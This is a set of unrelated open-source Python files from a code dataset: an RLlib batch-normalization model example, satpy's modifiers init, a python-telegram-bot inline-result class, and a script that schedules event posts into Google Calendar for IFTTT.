name="out")
self._value_out = tf1.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf1.get_collection(
tf1.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
    IMPORTANT NOTE: This model will not work with PPO due to a bug in keras
that surfaces when having more than one input placeholder (here: `inputs`
and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
PPO), in which auto-placeholders are generated, then passed through the
    tf.keras.models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class TorchBatchNormModel(TorchModelV2, nn.Module):
"""Example of a TorchModelV2 using batch normalization."""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name, **kwargs):
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
layers = []
prev_layer_size = int(np.product(obs_space.shape))
self._logits = None
# Create layers 0 to second-last.
for size in [256, 256]:
layers.append(
SlimFC(
in_size=prev_layer_size,
out_size=size,
initializer=torch_normc_initializer(1.0),
activation_fn=nn.ReLU))
prev_layer_size = size
# Add a batch norm layer.
layers.append(nn.BatchNorm1d(prev_layer_size))
self._logits = SlimFC(
in_size=prev_layer_size,
out_size=self.num_outputs,
initializer=torch_normc_initializer(0.01),
activation_fn=None)
self._value_branch = SlimFC(
in_size=prev_layer_size,
out_size=1,
initializer=torch_normc_initializer(1.0),
activation_fn=None)
self._hidden_layers = nn.Sequential(*layers)
self._hidden_out = None
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
# Set the correct train-mode for our hidden module (only important
# b/c we have some batch-norm layers).
self._hidden_layers.train(mode=input_dict.get("is_training", False))
self._hidden_out = self._hidden_layers(input_dict["obs"])
logits = self._logits(self._hidden_out)
return logits, []
@override(ModelV2)
def value_function(self):
assert self._hidden_out is not None, "must call forward first!"
return torch.reshape(self._value_branch(self._hidden_out), [-1])
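# Usage sketch (illustrative; the registered name and config values are assumptions,
# not part of this example file): custom models like the ones above are registered
# with RLlib's ModelCatalog and then referenced by name in a trainer config.
if __name__ == "__main__":
    from ray.rllib.models import ModelCatalog

    # register one of the models defined above under a short name
    ModelCatalog.register_custom_model("bn_model", TorchBatchNormModel)

    # a config fragment that would make a trainer build the registered model
    example_config = {
        "framework": "torch",
        "model": {"custom_model": "bn_model"},
    }
    print(example_config)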
|
richardliaw/ray
|
rllib/examples/models/batch_norm_model.py
|
Python
|
apache-2.0
| 7,538
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Modifier classes and other related utilities."""
# file deepcode ignore W0611: Ignore unused imports in init module
from .base import ModifierBase # noqa: F401, isort: skip
from .atmosphere import CO2Corrector # noqa: F401
from .atmosphere import PSPAtmosphericalCorrection # noqa: F401
from .atmosphere import PSPRayleighReflectance # noqa: F401
from .geometry import EffectiveSolarPathLengthCorrector # noqa: F401
from .geometry import SunZenithCorrector # noqa: F401
from .spectral import NIREmissivePartFromReflectance # noqa: F401
from .spectral import NIRReflectance # noqa: F401
|
pytroll/satpy
|
satpy/modifiers/__init__.py
|
Python
|
gpl-3.0
| 1,328
| 0
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the classes that represent Telegram
InlineQueryResultCachedVideo"""
from telegram import InlineQueryResult, InlineKeyboardMarkup, InputMessageContent
class InlineQueryResultCachedVideo(InlineQueryResult):
def __init__(self,
id,
video_file_id,
title,
description=None,
caption=None,
reply_markup=None,
input_message_content=None,
**kwargs):
# Required
super(InlineQueryResultCachedVideo, self).__init__('video', id)
self.video_file_id = video_file_id
self.title = title
# Optionals
if description:
self.description = description
if caption:
self.caption = caption
if reply_markup:
self.reply_markup = reply_markup
if input_message_content:
self.input_message_content = input_message_content
@staticmethod
def de_json(data):
data = super(InlineQueryResultCachedVideo, InlineQueryResultCachedVideo).de_json(data)
data['reply_markup'] = InlineKeyboardMarkup.de_json(data.get('reply_markup'))
data['input_message_content'] = InputMessageContent.de_json(data.get(
'input_message_content'))
return InlineQueryResultCachedVideo(**data)
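# Usage sketch (illustrative, not part of the library module; the id and file_id below
# are made-up placeholders): a cached-video result is constructed like any other inline
# result and then returned among the answers to an inline query,
# e.g. via bot.answerInlineQuery(inline_query_id, results=[result]).
if __name__ == '__main__':
    result = InlineQueryResultCachedVideo(
        id='1',
        video_file_id='BAADBAADexampleFileId',  # placeholder Telegram file_id
        title='A cached video',
        caption='Optional caption')
    print(result.video_file_id, result.title)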
|
franciscod/python-telegram-bot
|
telegram/inlinequeryresultcachedvideo.py
|
Python
|
gpl-2.0
| 2,181
| 0.001376
|
#!/usr/bin/python3
'''
Calculate posting schedules in social media of events and add them to google calendar
so they can be posted using IFTTT (so dirty!)
'''
# Google Developers Console:
# project name: tdf-eventos-gcalcli
# activate gcal API
# activate OAuth 2.0 API
# instal: pip3 install --upgrade google-api-python-client
#URL SHORTENER:
# urlshortener.url.list to get a list of shortened links from user
# urlshortener.url.get get info about a shorted url
#GCAL:
# probably we could need it. event['id'] (same as event['iCalUID'], this has @google.com)
# TODO: save processed events to the txt file once the city is done. (avoid possible losts when script breaks)
# FIX: Sometimes it doesnt parse properly (example as of 2017-11-29: Primera Ecomaratón Playas Limpias, Kendo - Seminario Tierra del Fuego)
# TODO: use the metadata in file to check if it's old or not. Reason: events that span multiple days (expositions) and were added later.
# TODO: support to create shorturls
# PRobably we should read config file so we dont hardcode stuff
# TODO: find a way to fix updated events.
# - Search the event in calendar, edit
# - delete the line in processed posts and just add the new one
#
# creating function (https://developers.google.com/google-apps/calendar/v3/reference/events/update)
# []Promps user to enter text to search;
# []searches and gets id;
# prints event info
# asks what to update (start, end, title, location) add more
# creates new title/summary and description
# updates event
# use named tuples
'''>>> from collections import namedtuple
>>> Point = namedtuple('Point', ['x','y'])
>>> p = Point(x=11,y=22)
>>> p = p._replace(x=80)
>>> p
Point(x=80, y=22)
'''
#import sys
import os
import json
import argparse
import random #for the minutes
import datetime
import re
import time
# required Libs (for Google connect)
try:
from apiclient.discovery import build
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
    from oauth2client import client
    from oauth2client import tools
from apiclient.errors import HttpError
import httplib2
except ImportError as e:
print (" Need Google API libs. Install with: pip3 install --upgrade google-api-python-client")
exit()
#optional libs
try:
import yaml
YAML = True
except ImportError:
#YAML = False
#print (" next time install pyyaml")
print (" Install : pip3 install pyyaml")
exit()
# --------------
# configuration
# --------------
CALENDAR_ID = "primary" #IFTTT uses the primary calendar
POST_FOLDER = '_posts'
# where the posts reside
CITIES = ('rio-grande','ushuaia','tolhuin')
# we are in a subfolder now, must get the parent folder
ROOT_DIR = os.path.dirname(os.getcwd())
PROCESSED_POSTS_FILE = "processed-posts.txt" #date,city,filename
PROCESSED_POSTS_FILE_LINE = "{ciudad}@{filename}"
# how the places folder is called. rio-grande is called riogrande
PLACES_FOLDER = "_lugares-{ciudad}"
HOUR_SCHEDULE = ('09', '13', '17', '21') #minutes are random
DAYS_BEFORE = 11 #How many days before do we start posting the event?
DAYS_SPANS_MANUAL_UPDATE = 3 # mostly for site update
GOOGLE_AUTH = "client_secrets.json"
USER_CREDENTIALS = 'gcal-tdf-credentials.json'
APPLICATION_NAME = 'tdf-eventos-gcalcli'
# -------------------
# end configuration
# -------------------
FILES_FOR_PROCESSED_LIST = list() #so we write everything once
PROCESSED_POSTS_FILE = os.path.join(os.getcwd(),PROCESSED_POSTS_FILE)
GOOGLE_AUTH = os.path.join(os.getcwd(), GOOGLE_AUTH)
USER_CREDENTIALS = os.path.join(os.getcwd(), USER_CREDENTIALS)
# be nice and allow to include the secret/keys as parameters
parser = argparse.ArgumentParser()
parser.add_argument("--client", help="path of the client_secret.json")
parser.add_argument("--user", help="path of the user secret_key.json")
parser.add_argument("--clean", help="Cleans the processed file list", action="store_true")
parser.add_argument("--edit", help="Edit an event")
parser.add_argument("--site-update", "-su", help="Add manually, starts from today and spans " + str(DAYS_SPANS_MANUAL_UPDATE) + " days. Mostly for site updates.")
#args = vars(parser.parse_args()) #to dict
args = parser.parse_args()
if args.clean:
clean_processed_file()
exit()
if args.client or args.user:
if args.client:
GOOGLE_AUTH = args.client
if args.user:
USER_CREDENTIALS = args.user
if not os.path.exists(GOOGLE_AUTH):
print (" sorry, I need the app credentials.")
exit()
if args.edit:
#edit_event()
print ("not yet implemented. Sorry")
exit()
# --------------
# functions
# --------------
def get_processed_file():
"""Get the processed file, returning it as a list.
Returns:
list
"""
if os.path.exists(PROCESSED_POSTS_FILE):
with open(PROCESSED_POSTS_FILE,'r',encoding="utf-8") as tmp:
#readlines() includes de new-line char. we want things easy ;)
return tmp.read().splitlines()
return False
def clean_processed_file():
"""Filters processed file, deleting old entries. """
today = datetime.datetime.today()
processed_posts = get_processed_file()
if not processed_posts:
print (" there was an error with the processed file. Does it exist?")
return False
cleaned_posts = list()
for row in processed_posts:
tmp_line = row.split("@")[1]
tmp_line = tmp_line[0:10]
tmp_date = datetime.datetime.strptime(tmp_line, '%Y-%m-%d')
if tmp_date >= today:
cleaned_posts.append(row)
if len(cleaned_posts) > 0:
with open(PROCESSED_POSTS_FILE,'w',encoding="utf-8") as tmp:
tmp.write("\n".join(cleaned_posts))
print(" Processed file cleaned!")
else:
print(" Everything is ok. Processed file not modified. ")
def googleAuth():
"""Authenticate Google API call
Returns:
http object (authorized)
"""
# Storage object holds the credentials (for a single user)
# If the file does not exist, it is created.
storage = Storage(USER_CREDENTIALS)
# Get the credentials
credentials = storage.get()
if not credentials or credentials.invalid:
'''
flow = OAuth2WebServerFlow(client_id=API_CLIENT_ID,
client_secret=API_CLIENT_SECRET,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener']
)
'''
flow = client.flow_from_clientsecrets(
GOOGLE_AUTH,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener'],
)
flow.user_agent = APPLICATION_NAME
# new credentials need to be obtained.
# oauth2client.tools.run() opens an authorization server page
# in default web browser.
# The new credentials are also stored in the Storage object,
# which updates the credentials file.
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
if flags:
credentials = tools.run_flow(flow, storage, flags)
print (" storing credentials to " + USER_CREDENTIALS)
# authorize credentials
http = credentials.authorize(httplib2.Http())
return http
def useService(service_type):
""" "Shortcut" to the service/API call
Args:
service_type (str): which service? calendar or url (urlshortener)
Returns:
build object kind of thing (google)
"""
service = ("", "")
if service_type == "calendar":
service = ("calendar", "v3")
elif service_type == "url":
service = ("urlshortener", "v1")
else:
print (" wrong key for Google Service")
exit()
return build(serviceName=service[0], version=service[1], http=googleAuth())
def listEvents():
# The Calendar API's events().list method returns paginated results, so we
# have to execute the request in a paging loop. First, build the
# request object. The arguments provided are:
# primary calendar for user
service = useService('calendar')
request = service.events().list(calendarId=CALENDAR_ID)
# Loop until all pages have been processed.
while request != None:
# Get the next page.
response = request.execute()
# Accessing the response like a dict object with an 'items' key
# returns a list of item objects (events).
for event in response.get('items', []):
print ("--------------------------")
# The event object is a dict object with a 'summary' key.
print(event['summary'])
print(event['start']['dateTime'])
print(event['location'])
print(event['description'])
# Get the next request object by passing the previous request object to
# the list_next method.
request = service.events().list_next(request, response)
def scheduleEvent(list_schedule, event_data, isevent=True):
'''
Inserts the event into google calendar.
:param:list_schedule list list of dates
:param:event_data dict event data
:param:isevent bool is it event or a manual update? default true (event)
'''
cal_service = useService('calendar')
timezone = 'America/Argentina/Ushuaia'
if not isevent:
event = {}
event['summary'] = "Actualizacion sitio: changelog: " + event_data['start']
event['start'] = {'dateTime': event_data['start'], 'timeZone': timezone}
event['end'] = {'dateTime': event_data['end'], 'timeZone': timezone}
end_date_iso = event_data['end'].isoformat()
event['description'] = event_data['description']
#use recurrence so we dont have to create daily events within same time
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
executeCall(cal_service.events().insert(calendarId=CALENDAR_ID, body=event))
print(" Manual update added")
else:
'''
ifttt ingredients
Title The event's title.
Description The event's description.
Where The location where the event takes place.
Starts ej August 23, 2011 at 10:00PM
Ends ej: August 23, 2011 at 11:00PM
'''
# so dirty
gcal_description = "#{city} {tags} {title} {shortURL}({human_date}{place})"
end_date_iso = event_data['end']['timestamp'].isoformat()
def _fecha_humana(date_time, abbr=False):
""" translate to human dates (spanish, quick and dirty)
Args:
date_time (datetime object)
abbr (boolean) abreviate month names? default False
Returns:
str
"""
tmp = date_time.strftime('%d de //%m//, %H:%M hs')
tmp_month_number = tmp.split("//")[1].split("//")[0]
month = ""
if tmp_month_number == "01":
month = "en." if abbr else "enero"
if tmp_month_number == "02":
month = "febr." if abbr else "febrero"
if tmp_month_number == "03":
month = "mzo." if abbr else "marzo"
if tmp_month_number == "04":
month = "abr." if abbr else "abril"
if tmp_month_number == "05":
month = "my." if abbr else "mayo"
if tmp_month_number == "06":
month = "jun." if abbr else "junio"
if tmp_month_number == "07":
month = "jul." if abbr else "julio"
if tmp_month_number == "08":
month = "agt." if abbr else "agosto"
if tmp_month_number == "09":
month = "sept." if abbr else "septiembre"
if tmp_month_number == "10":
month = "oct." if abbr else "octubre"
if tmp_month_number == "11":
month = "nov." if abbr else "noviembre"
if tmp_month_number == "12":
month = "dic." if abbr else "diciembre"
tmp = tmp.replace("//" + tmp_month_number + "//", month)
return tmp
#cycle list
for date_time in list_schedule:
human_datetime_start = ""
event = {}
tags = ""
city = ""
place = ""
shortURL = ""
if event_data['city'] == "rio-grande":
city = "RioGrande"
else:
city = event_data['city'].title()
#event['reminders'] = dict()
#event['reminders']['useDefault'] = False #remove reminder, this is for myself
event['summary'] = event_data['title']
event['start'] = {'dateTime': date_time[0], 'timeZone': timezone}
event['end'] = {'dateTime': date_time[1], 'timeZone': timezone}
#human_datetime_end = _fecha_humana(event_data['start']['timestamp'], abbr=True) #the real date
human_datetime_end = event_data['start']['timestamp'].strftime('%d/%m, %H:%M hs')
# if not time set, remove the 00:00 added when creating the timestamp
if not event_data['start']['time']:
human_datetime_end = human_datetime_end.replace("00:00 hs","")
#if all day: {'date': eEnd}
print (" schedule from {} to {} until {}".format(
date_time[0].replace("T", " ").replace(":00-03:00","")
,date_time[1].replace("T", " ").replace(":00-03:00","")
, end_date_iso.split("T")[0]
)
)
            if event_data['location'] != "":
event['location'] = event_data['location']
if event['location']:
place = ", en " + event_data['location']
final_summary = event['summary']
tags = ""
if event_data['tags']:
#tags = " #" + event_data['tags'].replace(",", " #")
all_tags = event_data['tags'].split(",")
reminding_tags = list()
# shouldn't be doing this but it's quicker now than using regex
final_summary = " " + final_summary + " "
# and also shouldn't be doing this but we don't want to deal with accented letters
# and the tag stuff...
final_summary = final_summary.replace("ó","o").replace("í","i")
#use part of the title to include tags (saving space)
tmp_tag = ""
for tag in all_tags:
tmp_tag = " " + tag + " "
if tmp_tag.lower() in final_summary.lower():
pattern = re.compile( re.escape(tmp_tag), re.IGNORECASE )
final_summary = pattern.sub(" #" + tag, final_summary)
else:
reminding_tags.append(tag)
final_summary = final_summary.strip()
tags = " #".join(reminding_tags)
tags = "#" + tags
if event_data['short-url']:
shortURL = event_data['short-url'] + " "
event['description'] = gcal_description.format(
city=city, tags=tags, title=final_summary
, human_date=human_datetime_end, place=place
, shortURL=shortURL
)
#use recurrence so we dont have to create daily events within same time
#event['recurrence'] = ['RRULE:FREQ=DAILY;UNTIL=20151007T193000-03:00']
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
#newEvent = cal_service.events().insert(calendarId=CALENDAR_ID, body=event)
executeCall(cal_service.events().insert(calendarId=CALENDAR_ID, body=event)) #or newEvent.execute()
def shortenURL(url):
""" Shortens the URL
Args:
url (str)
Returns:
str: shortened URL
"""
short = executeCall(
useService('url').url().insert(body={'longUrl': url})
)
return short['id']
def executeCall(method, retries=5):
    """ Executes the API method, retrying with exponential backoff when rate-limited.
    Args:
        method (google API request object)
        retries (int): maximum number of attempts when hitting a rate limit
    Returns:
        unknown: method executed or None if failed
    """
    for n in range(retries):
        try:
            return method.execute()
        except HttpError as e:
            error = json.loads(e.content)
            if error.get('code') == '403' and \
                error.get('errors')[0].get('reason') \
                in ['rateLimitExceeded', 'userRateLimitExceeded']:
                time.sleep((2 ** n) + random.random())
            else:
                raise
    return None
def process_post(path, city, meta=False):
"""Process the post
Args:
path (str)
city (str)
meta (dict) if we got the metadata before
"""
print(" Getting metadata... ", end="")
if not meta:
meta = get_post_metadata(path, city)
print(" done.")
print(" Creating post schedule... ", end="")
post_schedule = create_post_schedule(meta['start']['date'], meta['end']['date'])
print(" done.")
# create google calendar event
print(" Inserting post's schedule in Google Calendar... ")
scheduleEvent(post_schedule, meta)
return True # future proof: if we have an error in some kind
def get_post_metadata(path, city):
"""Get metadata from post
Args:
path (str)
city (str)
Returns:
dictionary
"""
the_post = ""
# date is date-start, but keep it like this (less coding conditionals)
metadata = {
'title':'', 'date':'','date-end':'','city': city
,'tags':'','short-url':'', 'location':'',
'start' : {'date': '', 'time':'', 'timestamp':''},
'end' : {'date': '', 'time':'', 'timestamp':''}
#date = only date, in str: yyyy-mm-dd
#time = only time, in str: hh:mm
#timestamp = datetime, the object
}
keys = list(metadata.keys()) #so we can remove stuff, like city key
keys.remove('city')
with open(path,'r',encoding="utf-8") as tmp:
if YAML:
the_post = tmp.read()
else:
the_post = tmp.readlines()
tmp = ""
if YAML:
        # we could have faked it and told YAML we have many documents
# inside of file (but only having one) but let's not lie
# to the poor thing
'''
for data in yaml.load_all(document):
if data:
print (data['title'])
'''
yaml_doc = yaml.load(the_post.split("---")[1])
for key in keys:
if key in yaml_doc:
if key == "date":
metadata["start"]['date'] = yaml_doc[key]
elif key == "date-end":
metadata["end"]['date'] = yaml_doc[key]
else:
metadata[key] = yaml_doc[key]
if key == "tags":
metadata[key] = ",".join(metadata[key])
else:
yaml_block = 0
for i,line in enumerate(the_post):
if line.startswith("---"):
if yaml_block == 0:
yaml_block = 1
else:
break
tmp_line = line.strip().split(": ", 1)
for key in keys:
if line.startswith(key + ":"):
if not key == "tags":
if metadata[key]:
metadata[key] = tmp_line[1]
if key == "date":
metadata["start"]['date'] = tmp_line[1]
elif key == "date-end":
metadata["end"]['date'] = tmp_line[1]
else:
if tmp_line[1] != "[]":
metadata['tags'] = tmp_line[1].replace("[", "").replace("]","")
#check if location has ID, and if it does, find the proper name
metadata['location'] = find_place_id(city, metadata['location'])
#normalize dates. Use YYYY-MM-DDTHH:MM:SS
if metadata['start'] and " " in str(metadata['start']['date']):
datetime_pieces = metadata['start']['date'].split(" ")
metadata['start']['date'] = datetime_pieces[0]
if datetime_pieces[1] and ":" in datetime_pieces[1]:
metadata['start']['time'] = datetime_pieces[1] + ":00"
datetime_pieces[1] += ":00"
metadata['start']['timestamp'] = "T".join(datetime_pieces)
metadata['start']['timestamp'] = datetime.datetime.strptime(metadata['start']['timestamp'], '%Y-%m-%dT%H:%M:00')
else:
metadata['start']['date'] = str(metadata['start']['date'])
metadata['start']['timestamp'] = datetime.datetime.strptime(metadata['start']['date'], '%Y-%m-%d')
metadata['start']['time'] = ""
if metadata['end'] and " " in str(metadata['end']['date']):
datetime_pieces = metadata['end']['date'].split(" ")
metadata['end']['date'] = datetime_pieces[0]
if datetime_pieces[1] and ":" in datetime_pieces[1]:
metadata['end']['time'] = datetime_pieces[1] + ":00"
datetime_pieces[1] += ":00"
metadata['end']['timestamp'] = "T".join(datetime_pieces)
metadata['end']['timestamp'] = datetime.datetime.strptime(metadata['end']['timestamp'], '%Y-%m-%dT%H:%M:00')
else:
metadata['end']['timestamp'] = metadata['start']['timestamp'] + datetime.timedelta(hours=1)
metadata['end']['date'] = metadata['end']['timestamp'].strftime('%Y-%m-%d')
metadata['end']['time'] = metadata['end']['timestamp'].strftime('%H:%M:00')
#remove temporary keys
del metadata['date']
del metadata['date-end']
return metadata
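# For reference, get_post_metadata() returns a dict shaped roughly like this
# (the values shown are illustrative, following the normalization logic above):
#   {'title': '...', 'city': 'ushuaia', 'tags': 'musica,teatro', 'short-url': '',
#    'location': 'Casa de la Cultura',
#    'start': {'date': '2020-05-20', 'time': '21:00:00', 'timestamp': datetime(...)},
#    'end':   {'date': '2020-05-20', 'time': '22:00:00', 'timestamp': datetime(...)}}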
def get_places_id(city):
'''Get all the places ID with their proper name
:param:city str
:returns: dict where key = place ID, value = place name
'''
city = city.replace("-", "")
current_city_places_folder = PLACES_FOLDER.replace("{ciudad}", city)
current_city_places_folder = os.path.join(ROOT_DIR, current_city_places_folder)
if not os.path.exists(current_city_places_folder):
return False
places = dict()
HTMLTAG_RE = re.compile(r'<[^>]+>') # to remove HTML from name
for root,subdir,files in os.walk(current_city_places_folder):
for archivo in files:
if archivo.startswith("_") or not archivo.endswith(".md"):
continue
#open and get the ID key.
file_path = os.path.join(root,archivo)
with open(file_path, encoding="utf-8") as tmp:
places_file = tmp.read()
tmp = ""
if YAML:
yaml_doc = yaml.load(places_file.split("---")[1])
places[yaml_doc['uid']] = HTMLTAG_RE.sub("", yaml_doc['nombre'])
else:
places_file = places_file.split("---")[1]
places_file = places_file.splitlines()
tmp_name = ""
tmp_id = ""
for i,line in enumerate(places_file):
if line.startswith("uid:"):
tmp_id = line.split("id: ")[1]
if line.startswith("nombre:"):
tmp_name = line.split("nombre: ")[1]
if tmp_id and tmp_name:
places[tmp_id] = HTMLTAG_RE.sub("", tmp_name)
if not tmp_name:
places[tmp_id] = tmp_id
return places
def find_place_id(city,place):
#city = city.replace("-", "")
    if city not in PLACES_NAMES or not PLACES_NAMES[city]:
return place
if place in PLACES_NAMES[city]:
return PLACES_NAMES[city][place]
return place
def create_post_schedule(start_date, end_date):
"""Finds the schedule for posting the event
Args:
start_date (str): when the event starts (YYYY-MM-DD)
end_date (str): when the event ends (YYYY-MM-DD)
Returns:
LIST: list of dates - times
"""
random_minute = str(random.randrange(1,59))
post_schedule = list() #tuples: date,time
#use the start date as the finish date. We don't want courses and the like
#(that span multiple days) into the calendar
try:
date_start = datetime.datetime.strptime(start_date, '%Y-%m-%d') - datetime.timedelta(days=DAYS_BEFORE)
except TypeError:
date_start = start_date - datetime.timedelta(days=DAYS_BEFORE)
if len(random_minute) == 1 and not random_minute.startswith("0"):
random_minute = "0" + random_minute
for hour in HOUR_SCHEDULE:
tmp_start = date_start.strftime('%Y-%m-%d') + "T" + hour + ":" + random_minute + ":00-03:00"
# as we use recurrence, must use the endtime of the first instance!
# read: https://developers.google.com/google-apps/calendar/v3/reference/events/insert
tmp_duration = int(random_minute) + 5
if tmp_duration > 59:
tmp_duration = 59
tmp_end = date_start.strftime('%Y-%m-%d') + "T" + hour + ":" + str(tmp_duration) + ":00-03:00"
post_schedule.append((tmp_start,tmp_end))
return post_schedule
'''
#how many days in between, counts start date as 1
days_between = (date_end + datetime.timedelta(days=1) - date_start).days
for i in range(days_between):
for hour in HOUR_SCHEDULE:
tmp = date_start + datetime.timedelta(days=i)
post_schedule.append(
(tmp.strftime('%Y-%m-%d')),
hour + ":" + random_minute
)
'''
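# Worked example (illustrative): with DAYS_BEFORE = 11 and the configured HOUR_SCHEDULE,
# create_post_schedule('2020-05-20', '2020-05-20') returns four (start, end) pairs on
# 2020-05-09, one per scheduled hour, each spanning ~5 minutes (the minute is random):
#   [('2020-05-09T09:17:00-03:00', '2020-05-09T09:22:00-03:00'),
#    ('2020-05-09T13:17:00-03:00', '2020-05-09T13:22:00-03:00'),
#    ('2020-05-09T17:17:00-03:00', '2020-05-09T17:22:00-03:00'),
#    ('2020-05-09T21:17:00-03:00', '2020-05-09T21:22:00-03:00')]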
def update_processed_file(list_files):
"""Updates the processed posts file.
Args:
list_files (list): list of paths/strings
"""
#just dirtify it
with open(PROCESSED_POSTS_FILE,'a',encoding="utf-8") as tmp:
tmp.write("\n" + "\n".join(list_files))
# Not yet implemented
def searchEvent(query_text):
event_list = []
work = useService('calendar').events(
).list(calendarId=CALENDAR_ID,
#timeMin=start.isoformat() if start else None,
#timeMax=end.isoformat() if end else None,
q=query_text,
singleEvents=True)
events = executeCall(work)
if not events['items']:
return False
if len(events['items']) == 1:
return events['items'][0]['id']
# if we have more than one event, add to a list and then ask the user
# which one is the correct
for event in events['items']:
event_list.append(
(event['summary'], event['id'])
)
print (" found many entries. please indicate which one you want. ")
print (" type none if it's not any of the following. ")
for i, item in enumerate(event_list):
print(" " + str(i + 1) + ": " + item[0])
answer = ""
while not answer or (int(answer) > len(event_list)):
answer = input("I pick: ")
if answer.lower() == "none":
return False
try:
answer = int(answer)
except ValueError:
answer = ""
return event_list[answer - 1][1]
# Not yet implemented
def edit_event():
query_text = ""
new_date = ""
new_description = ""
new_summary = ""
while not query_text:
query_text = input(" Event to search for: ")
result = searchEvent(query_text)
if not result:
print (" event not found ")
exit()
service = useService("calendar")
#get the event data
event = service.events().get(calendarId=CALENDAR_ID, eventId=result).execute()
what_to_update = ""
print(" What do you want to update? ")
print(" s: start date ")
print(" e: end date ")
print(" t: title ")
print(" l: location ")
while not what_to_update or what_to_update not in ("s","e","t","l"):
what_to_update = input(": ")
# --------------
# start program!
# --------------
PLACES_NAMES = dict()
for city in CITIES:
PLACES_NAMES[city] = dict()
PLACES_NAMES[city] = get_places_id(city)
processed_posts = list()
if __name__ == '__main__':
print (" initiating ... " + PROCESSED_POSTS_FILE)
tmp = get_processed_file()
if tmp:
processed_posts = get_processed_file()
tmp = ""
    # get today's date (only)
timestamp_now = datetime.datetime.today()
# I don't know what i'm doing but it works
today_date = timestamp_now.isoformat(sep=' ').split()[0]
today_date = datetime.datetime.strptime(today_date, '%Y-%m-%d')
if args.site_update:
answer = ""
print ("Doing manual adition to gCal. Remember that this event starts from today and spans "+str(DAYS_SPANS_MANUAL_UPDATE)+" days. ")
while not answer:
answer = input(" description: ")
site_update = {}
site_update['description'] = answer
site_update['start'] = timestamp_now
site_update['end'] = timestamp_now + datetime.timedelta(days=DAYS_SPANS_MANUAL_UPDATE)
scheduleEvent([], site_update, isevent=False)
exit()
for ciudad in CITIES:
print (" \n ::: SCANNING " + ciudad + " :::")
current_folder = os.path.join(ROOT_DIR, ciudad, POST_FOLDER)
for root,subdir,files in os.walk(current_folder):
for archivo in files:
if archivo.startswith("_"):
continue
#filename = os.path.basename(path) #get filename from path
file_path = os.path.join(root,archivo)
#filename is YYYY-MM-DD-slug.md
file_date = "-".join(archivo.split("-")[0:3])
if file_date.split("-")[0] in ("2015", "2016", "2017"):
# Sorry, we dont want the old ones
#print ("\n Skiping (old): " + archivo, end="")
continue
file_line_processed = PROCESSED_POSTS_FILE_LINE.format(ciudad=ciudad,filename=archivo)
file_date = datetime.datetime.strptime(file_date, '%Y-%m-%d')
if file_date < today_date:
print (" Skiping (old): " + archivo)
continue
if file_line_processed in processed_posts:
print (" Skiping (already proccesed): " + archivo)
continue
# prevent new line so we can print on same line later
print (" Processing: " + archivo, end="")
